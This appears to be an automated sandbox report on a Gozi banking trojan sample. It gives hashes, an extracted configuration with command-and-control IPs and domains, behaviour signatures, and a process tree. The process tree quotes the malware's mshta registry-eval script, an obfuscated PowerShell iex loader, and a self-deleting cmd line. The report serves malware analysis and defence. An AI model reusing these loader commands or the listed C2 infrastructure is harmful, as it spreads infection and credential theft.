Overview

overview

10

Static

static

10

payload.exe

windows7-x64

10

payload.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-10-2023 01:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    payload.exe

  • Size

    37KB

  • MD5

    532039d2f764d59a4c1cac5e6091aa52

  • SHA1

    a1abbd3f89897952fc0a90e60ca49983c287a65c

  • SHA256

    bf0916eecb599636acf604e0111508923f638d8e077e9e0ab518f4e8f63f8e97

  • SHA512

    711c7a4d7481b414178542aac5ef908b5b66b50ed96305c9f159ea4b1762ddb77f2125470bbb8101909ff4c77c51d3c7e0a121d65a7356bc28756f8028f01b0b

  • SSDEEP

    768:MA3rPI5jShpW1v5wlZkyJ8Kl7aQixYgxYJmv0NHY7lbjNltdX2k:j3rPI5jSu1aZkyVJaf3C7YJj3HG

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Botnet

5050

C2

185.247.184.139

62.72.33.155

incontroler.com
Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top
Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3840
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4868
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3684
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3204
        • C:\Users\Admin\AppData\Local\Temp\payload.exe
          "C:\Users\Admin\AppData\Local\Temp\payload.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4180
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lxmj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lxmj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9\\\MemoryLocal'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2888
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name accmbcph -value gp; new-alias -name cskxtgdb -value iex; cskxtgdb ([System.Text.Encoding]::ASCII.GetString((accmbcph "HKCU:Software\AppDataLow\Software\Microsoft\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9").ProcessActive))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2304
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yigdydqy\yigdydqy.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3360
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4EC7.tmp" "c:\Users\Admin\AppData\Local\Temp\yigdydqy\CSCA6537DDA57574B58BC7124BA1872052.TMP"
                5⤵
                  PID:1660
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1zllhh4q\1zllhh4q.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1104
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4FFF.tmp" "c:\Users\Admin\AppData\Local\Temp\1zllhh4q\CSC5CDC9F64B1414774B5B67C8951EDCD23.TMP"
                  5⤵
                    PID:1612
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\payload.exe"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:5016
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:548
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:1056
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:1108

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\1zllhh4q\1zllhh4q.dll
              Filesize

              3KB

              MD5

              aab1512eff1aba634e47c20303f3af27

              SHA1

              0ed55099af1a6b61f7538b1334a8f5d3817d9c51

              SHA256

              0a953c68d02bbbc6e7a3ba7b181946f09e3e1964b5f50be619fb34e7ae398de3

              SHA512

              59ed91e4ccec2c6da98e88eadd11977d031f614d5428021874999acf2e9951a975c8ecf39282d459bb0ba7c0887a723486f5944255921146f56dc03e6252bd02

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\RES4EC7.tmp
              Filesize

              1KB

              MD5

              57165388661dfc2d2fd54626ea86c187

              SHA1

              744601f1dd5bf0097967830ac189859b084380a5

              SHA256

              3a8849e85f4976e2786e075be38fe0ca6b2310211b9560dc36fb7c48aa67210d

              SHA512

              b6a56da7791af7d3b5b1d24d74391f399f9927c3cd72343657fb296238d63c714fcdc82bde02aa73e2fa6405a98b0ca12b1a7d0ffb4eb16ab7f04df109bc6aff

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\RES4FFF.tmp
              Filesize

              1KB

              MD5

              490b17ad67dba66a263e318a3d321cd8

              SHA1

              74e3941e71570eaa445dfddc6402189342984513

              SHA256

              72b999f77145c42cb38c0546d18400dfda9e0e20300c67ef612e59f8a0590e60

              SHA512

              f6a7e0211511e8108ab1c34771ef3a5c760fe4355eac2f98bc6c2a94063dc144b3cdaa469cfe9ba0904102c3490ee523aa7741d1a4e2eff2020f2751313bcaca

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vazwdyz3.vwc.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\yigdydqy\yigdydqy.dll
              Filesize

              3KB

              MD5

              1b928733a16a593bb676f76833c61f5d

              SHA1

              236b3bae18b80898b4702189cf25af2422188bd7

              SHA256

              eadaec7e50f8b4dfa52ed234acf0311086dfb6bb99d3d7d3ad9e5954bd2945fa

              SHA512

              65475b7354418892fca6069ce0db2305199a699813ddb7e5bef44b4f6e6f51a2cd4014892ce86a72c775b40bc06a3327ee153d4fa2575109122c3a286f59bc23

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\1zllhh4q\1zllhh4q.0.cs
              Filesize

              406B

              MD5

              ca8887eacd573690830f71efaf282712

              SHA1

              0acd4f49fc8cf6372950792402ec3aeb68569ef8

              SHA256

              568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

              SHA512

              2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\1zllhh4q\1zllhh4q.cmdline
              Filesize

              369B

              MD5

              5f7f509c28c1796849e9c7e6516e5004

              SHA1

              e2fd4cb0b7170a4b37b67e563930ab31b0b50bcf

              SHA256

              74f3b71da8f877cc8760f476ec3ac2e1cbaf422eb80b787737faa1e349721717

              SHA512

              d2ccdb100c627ce12ac64e3b89781a9076cd061e648537badbc279ac472859fd6b11d5bfb619ac966301cc8e198d93cfb41efc97f6ff294b1fcab811e079120b

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\1zllhh4q\CSC5CDC9F64B1414774B5B67C8951EDCD23.TMP
              Filesize

              652B

              MD5

              0591056f5623cd2bd332c65b3fb98c99

              SHA1

              53c1f3dadb2f9259c29c7ac66baf8010f63624c4

              SHA256

              f355b770edc89f029ce47934bc9a62231a095acc5dc2caddb143d3bccaa6afe3

              SHA512

              b93a9ab2351bc15e20fd5b62b5845887626d3f97483db61f65078ef2c6a896c3bbd2aaa8d4c9b80780387f9b16baaf1311cefffe8721f002861ec6f89a0459c5

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\yigdydqy\CSCA6537DDA57574B58BC7124BA1872052.TMP
              Filesize

              652B

              MD5

              682b4ff354556981a5a02b4087b5015f

              SHA1

              7d6fb16bc1dc698079d9e98ca0b3fc381996cad2

              SHA256

              20a31ed98a1ef8a6bef5aa1d26dcb22f21bff45de4f7a021beac903f496df94a

              SHA512

              367ac586927b3fd15269878df7c71a12786230c388531923ab95879b255e3a181ce0406e988ad3c7830b2a67039001930ab24f24748392d573aa9245faa68fda

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\yigdydqy\yigdydqy.0.cs
              Filesize

              405B

              MD5

              caed0b2e2cebaecd1db50994e0c15272

              SHA1

              5dfac9382598e0ad2e700de4f833de155c9c65fa

              SHA256

              21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

              SHA512

              86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\yigdydqy\yigdydqy.cmdline
              Filesize

              369B

              MD5

              54385e76641619746bf9bbb1cf78272e

              SHA1

              2a77ac628278f76babb4b5cbcbb2ea4a71a4fbd8

              SHA256

              0f1704996367e7d45c6a971baa0fd7798dae17f0308a71500376f707c1ddd6d2

              SHA512

              51ed7608fd861ea2cfbd3976f3fade6890335a791d82a6210d0bf5b57b0edf36d572c668357a315dc5de1f846aa780499cb67720836f14aa00993a4594b818ce

              Download Submit

            • memory/548-99-0x0000026CB4300000-0x0000026CB43A4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/548-102-0x0000026CB4100000-0x0000026CB4101000-memory.dmp

              Filesize

              4KB

              Download

            • memory/548-107-0x0000026CB4300000-0x0000026CB43A4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/1056-89-0x0000000001690000-0x0000000001728000-memory.dmp

              Filesize

              608KB

              Download

            • memory/1056-98-0x0000000001690000-0x0000000001728000-memory.dmp

              Filesize

              608KB

              Download

            • memory/1056-95-0x0000000000FE0000-0x0000000000FE1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1108-79-0x0000018357800000-0x00000183578A4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/1108-109-0x0000018357800000-0x00000183578A4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/1108-80-0x00000183575D0000-0x00000183575D1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2304-59-0x00007FFA73750000-0x00007FFA74211000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2304-30-0x00000203D43B0000-0x00000203D43B8000-memory.dmp

              Filesize

              32KB

              Download

            • memory/2304-17-0x00000203EC9E0000-0x00000203EC9F0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2304-60-0x00000203EC950000-0x00000203EC98D000-memory.dmp

              Filesize

              244KB

              Download

            • memory/2304-13-0x00000203D4340000-0x00000203D4362000-memory.dmp

              Filesize

              136KB

              Download

            • memory/2304-14-0x00007FFA73750000-0x00007FFA74211000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2304-15-0x00000203EC9E0000-0x00000203EC9F0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/2304-44-0x00000203EC940000-0x00000203EC948000-memory.dmp

              Filesize

              32KB

              Download

            • memory/2304-46-0x00000203EC950000-0x00000203EC98D000-memory.dmp

              Filesize

              244KB

              Download

            • memory/2304-16-0x00000203EC9E0000-0x00000203EC9F0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3204-88-0x0000000009450000-0x00000000094F4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3204-48-0x0000000009450000-0x00000000094F4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3204-49-0x0000000008150000-0x0000000008151000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3684-68-0x000002B6A08C0000-0x000002B6A0964000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3684-69-0x000002B6A0880000-0x000002B6A0881000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3684-105-0x000002B6A08C0000-0x000002B6A0964000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3840-100-0x00000242D30B0000-0x00000242D3154000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3840-63-0x00000242D3160000-0x00000242D3161000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3840-62-0x00000242D30B0000-0x00000242D3154000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4180-0-0x0000000000460000-0x000000000046D000-memory.dmp

              Filesize

              52KB

              Download

            • memory/4868-74-0x0000027F74420000-0x0000027F744C4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4868-75-0x0000027F73BC0000-0x0000027F73BC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4868-106-0x0000027F74420000-0x0000027F744C4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/5016-91-0x0000021807050000-0x0000021807051000-memory.dmp

              Filesize

              4KB

              Download

            • memory/5016-87-0x0000021807100000-0x00000218071A4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/5016-108-0x0000021807100000-0x00000218071A4000-memory.dmp

              Filesize

              656KB

              Download